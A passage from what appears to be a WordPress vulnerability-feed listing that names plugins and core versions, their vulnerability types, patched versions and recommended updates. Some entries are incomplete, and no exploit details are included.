Vulnerability: 1.9.11
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Flowplayer Video Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: WordPress Poll

Vulnerability: SQL Injection
Patched Version: 34.06
Recommended Action: Update to version 34.06, or a newer patched version

Plugin: Universal Star Rating

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WTI Like Post

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.185.1
Recommended Action: Update to version 5.185.1, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Admin+ Arbitrary File Deletion via Zip Slip
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: TagGator

Vulnerability: SQL Injection
Patched Version: 1.33
Recommended Action: Update to version 1.33, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Sensitive Information Exposure
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.7
Recommended Action: Update to version 5.2.7, or a newer patched version

Plugin: Twitter Cards Meta – Best Twitter Card Plugin for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Adapta RGPD

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 8.0.08
Recommended Action: Update to version 8.0.08, or a newer patched version

Plugin: Church Admin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: wpShopGermany IT-RECHT KANZLEI

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: WP Favorite Posts

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Simple Job Board

Vulnerability: Missing Authorization
Patched Version: 2.10.6
Recommended Action: Update to version 2.10.6, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WordPress Responsive Preview

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated Open Redirect
Patched Version: 3.3.19.1
Recommended Action: Update to version 3.3.19.1, or a newer patched version

Plugin: Auto Featured Image (Auto Post Thumbnail)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via import
Patched Version: 3.6.11
Recommended Action: Update to version 3.6.11, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Unauthorized Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: cformsII

Vulnerability: Arbitrary File Upload
Patched Version: 14.8
Recommended Action: Update to version 14.8, or a newer patched version

Plugin: WDSocialWidgets

Vulnerability: SQL Injection
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Banner Management For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: simpleflickr

Plugin: RokStories

Vulnerability: Full Path Disclosure
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: WP BaiDu Submit

Plugin: Gallery PhotoBlocks

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated Stored Cross-Site Scripting via Title & Description
Patched Version: 9.8.0
Recommended Action: Update to version 9.8.0, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.11.1
Recommended Action: Update to version 2.7.11.1, or a newer patched version

Plugin: BackUpWordPress

Vulnerability: Remote File Inclusion
Patched Version: 0.4.3
Recommended Action: Update to version 0.4.3, or a newer patched version

Plugin: Simple Quotation

Vulnerability: SQL injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 301 Redirects – Easy Redirect Manager

Vulnerability: Easy Redirect Manager <= 2.72
Patched Version: 2.73
Recommended Action: Update to version 2.73, or a newer patched version

Plugin: Testimonial WordPress Plugin – AP Custom Testimonial

Vulnerability: SQL Injection
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: WPPizza – A Restaurant Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.17.2
Recommended Action: Update to version 3.17.2, or a newer patched version

Plugin: Crayon Syntax Highlighter

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: MainWP Maintenance Extension

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Arbitrary Settings Change
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: WP Brutal AI

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.06
Recommended Action: Update to version 2.06, or a newer patched version

Plugin: wp-live-chat-support-pro

Vulnerability: Arbitrary File Upload
Patched Version: 8.0.27
Recommended Action: Update to version 8.0.27, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 3.2.49
Recommended Action: Update to version 3.2.49, or a newer patched version

Plugin: Push Notification for Post and BuddyPress

Vulnerability: Missing Authorization to Unauthenticated Admin Notice Dismissal
Patched Version: 1.64
Recommended Action: Update to version 1.64, or a newer patched version

Plugin: HTML5 SoundCloud Player with Playlist Free

Vulnerability: Authenticated (Author+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Missing Authorization to Vote Tampering
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘pages’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Protect WP Admin

Vulnerability: Unauthenticated Plugin Deactivation
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery <= 1.7.0
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WP People

Plugin: Custom Field Template

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: Coupon Tab for DirectoryPress (pp-coupon-tab)

Plugin: Hubbub Lite – Fast, Reliable Social Sharing Buttons

Vulnerability: Missing Authorization via multiple admin_init actions
Patched Version: 1.30.1
Recommended Action: Update to version 1.30.1, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Missing Authorization to Arbitrary User Deletion
Patched Version: 3.8.1.3
Recommended Action: Update to version 3.8.1.3, or a newer patched version

Plugin: new-year-firework

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via accessibility-helper Title
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: Login with TOTP (Google Authenticator, Microsoft Authenticator)

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Authenticated (Admin+) Cross Site Scripting (XSS)
Patched Version: 1.5.49
Recommended Action: Update to version 1.5.49, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Slick Contact Forms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: spider-calendar

Vulnerability: Multiple Vulnerabilities
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.41
Recommended Action: Update to one of the following versions, or a newer patched version: 3.2.41, 3.2.5

Plugin: Dashicons + Custom Post Types

Plugin: WP Smart Import : Import any XML File to WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP LESS to CSS

Plugin: Register Plus

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: SQL Injection
Patched Version: 1.2.5.4
Recommended Action: Update to version 1.2.5.4, or a newer patched version

Plugin: Limit Login Attempts Plus – WordPress Limit Login Attempts By Felix

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Securimage-WP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: PowerPack Elementor Addons (Free Widgets, Extensions and Templates)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Donation Plugin <= 2.33.0
Patched Version: 2.33.1
Recommended Action: Update to version 2.33.1, or a newer patched version

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Cross-Site Request Forgery via AJAX action
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: MicroPayments – Fans Paysite: Paid Creator Subscriptions, Digital Assets, Tokens Wallet

Vulnerability: Paid Author Subscriptions, Content, Downloads, Membership <= 1.9.5
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: Geo Controller

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.13.12
Recommended Action: Update to version 7.13.12, or a newer patched version

Plugin: The Events Calendar

Vulnerability: Cross-Site Scripting via tribe_paged Parameter
Patched Version: 4.8.2
Recommended Action: Update to version 4.8.2, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 4.6.0.1
Recommended Action: Update to version 4.6.0.1, or a newer patched version

Plugin: Elements For Elementor

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: DiveBook

Plugin: Fancy Product Designer

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 4.7.6
Recommended Action: Update to version 4.7.6, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: SQL Injection
Patched Version: 7.3.19.727
Recommended Action: Update to version 7.3.19.727, or a newer patched version

Plugin: Events

Plugin: Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress

Vulnerability: Sensitive Information Exposure
Patched Version: 20.5.4
Recommended Action: Update to version 20.5.4, or a newer patched version

Plugin: Football Pool

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: GetResponse for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.21
Recommended Action: Update to version 5.5.21, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.19.2
Recommended Action: Update to version 4.19.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Ultimate Appointment Booking & Scheduling

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Contact Form Builder by vcita

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.13
Recommended Action: Update to version 1.9.13, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Ubigeo de Perú para Woocommerce y WordPress

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Classified Listing – Classified ads & Business Directory Plugin

Vulnerability: Cross-Site Request Forgery via rtcl_ajax_thumbnail_delete
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Multiple SQL Injection
Patched Version: 1.5.16
Recommended Action: Update to version 1.5.16, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.94
Recommended Action: Update to version 3.3.94, or a newer patched version

Plugin: Advance Search for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: aBitGone CommentSafe

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery via give_get_content_by_ajax_handler
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: WP Private Content Plus

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: BuddyPress Builder for Elementor – BuddyBuilder

Vulnerability: BuddyPress Builder for Elementor <= 1.7.3
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: LIQUID SPEECH BALLOON

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Custom Sidebars – Dynamic Sidebar Widget Area Manager

Vulnerability: Reflected Cross Site Scripting
Patched Version: 2.1.0.2
Recommended Action: Update to version 2.1.0.2, or a newer patched version

Plugin: Social Sharing Plugin – Sassy Social Share

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.45
Recommended Action: Update to version 3.3.45, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.51
Recommended Action: Update to version 1.6.51, or a newer patched version

Plugin: Creative Mail – Easier WordPress & WooCommerce Email Marketing

Vulnerability: Cross-Site Request Forgery to Plugin Deactivation
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Custom Post Type Generator

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Subpages Extended

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analytics Insights – Google Analytics Dashboard for WordPress

Vulnerability: Open Redirect
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Meks Easy Photo Feed Widget

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Tune Library

Vulnerability: SQL Injection
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Schema – All In One Schema Rich Snippets

Vulnerability: All In One Schema Rich Snippets <= 1.6.5
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Network Settings Page
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Delete Usermetas

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Featured Comments

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: SEO Plugin LiveOptim

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: File Upload Path Traversal
Patched Version: 1.5.75
Recommended Action: Update to version 1.5.75, or a newer patched version

Plugin: Super Store Finder

Vulnerability: Arbitrary File Upload
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: Real Testimonials – Testimonial Slider, Carousel, Grid | Collect Customer Reviews and Video Testimonial with Testimonial Form | Social Proof Reviews and Review Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Price Table

Plugin: WordPress Custom Settings

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Security Question

Plugin: Print My Blog – Print, PDF, & eBook Converter WordPress Plugin

Vulnerability: Server-Side Request Forgery
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via Form, Prize, and Sharing Method Fields
Patched Version: 2.45.1
Recommended Action: Update to version 2.45.1, or a newer patched version

Plugin: Brandfolder – Digital Asset Management Simplified.

Vulnerability: Local/Remote File Inclusion
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: AB Google Map Travel (AB-MAP)

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Portfolio Responsive Gallery

Vulnerability: Blind SQL Injection
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Add Local Avatar

Vulnerability: Cross-Site Request Forgery via manage_avatar_cache
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Privilege Escalation
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Missing Authorization Checks
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Forym

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 6.0
Recommended Action: Update to version 6.0, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit

Vulnerability: Missing Authorization
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Custom Searchable Data Entry System

Vulnerability: Unauthenticated Database Wiping
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GoHero Store Customizer for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Getnet Argentina para WooCommerce

Vulnerability: 0.0.4
Patched Version: 0.0.5
Recommended Action: Update to version 0.0.5, or a newer patched version

Plugin: Captchinoo, admin login page protection with Google recaptcha

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Missing Capabilities Check
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Missing Authorization to Admin Account and Ticket Creation
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: WordPress to Freshsales Integration

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: HTML5 Responsive FAQ

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary Page Modification
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: Material Design Icons for Page Builders

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Cross-Site Request Forgery to Transient Cache Clearing
Patched Version: 3.1.43
Recommended Action: Update to version 3.1.43, or a newer patched version

Plugin: External Links in New Window / New Tab

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: FileBird – WordPress Media Library Folders & File Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.7.4
Recommended Action: Update to version 4.7.4, or a newer patched version

Plugin: Export All URLs

Vulnerability: Arbitrary File Deletion
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Kraken.io Image Optimizer

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Options Update
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.8.1
Recommended Action: Update to version 3.2.8.1, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.9.6
Recommended Action: Update to version 5.9.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authorization Bypass
Patched Version: 2.9.6
Recommended Action: Update to version 2.9.6, or a newer patched version

Plugin: WPFrom Email

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: Csv2WPeC Coupon

Plugin: CardGate Payments for WooCommerce

Vulnerability: Lack of Origin Validation
Patched Version: 3.1.16
Recommended Action: Update to version 3.1.16, or a newer patched version

Plugin: Schedulicity – Easy Online Scheduling

Vulnerability: Easy Online Scheduling <= 2.21
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: History Collection

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 3.7.11
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.11, 3.8.11, 3.9.9, 4.0.8, 4.1.8, 4.2.5, 4.3.1

Plugin: WP Customer Reviews

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: WHMCS Bridge

Vulnerability: No subtitle
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: CP Image Store with Slideshow

Vulnerability: Arbitrary File Download
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Easy Social Feed – Social Photos Gallery – Post Feed – Like Box

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.2.7
Recommended Action: Update to version 6.2.7, or a newer patched version

Plugin: Mailtree Log Mail

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: yurl-retwitt

Plugin: Add Post URL

Plugin: TablePress – Tables in WordPress made easy

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: DoLogin Security

Vulnerability: Missing Authorization on Dashboard Widget
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Contact Form 7 Captcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.2
Recommended Action: Update to version 0.1.2, or a newer patched version

Plugin: IP Blacklist Cloud

Plugin: Frontier Post

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.7.4
Recommended Action: Update to version 3.7.4, or a newer patched version

Plugin: WP Roadmap – Product Feedback Board

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Inline Related Posts

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via wp_user_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Fancy Comments WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting via Shortcode
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: SVG Support

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Enhanced Text Widget

Vulnerability: Missing Authorization via etw_hide_admin_notification_callback
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

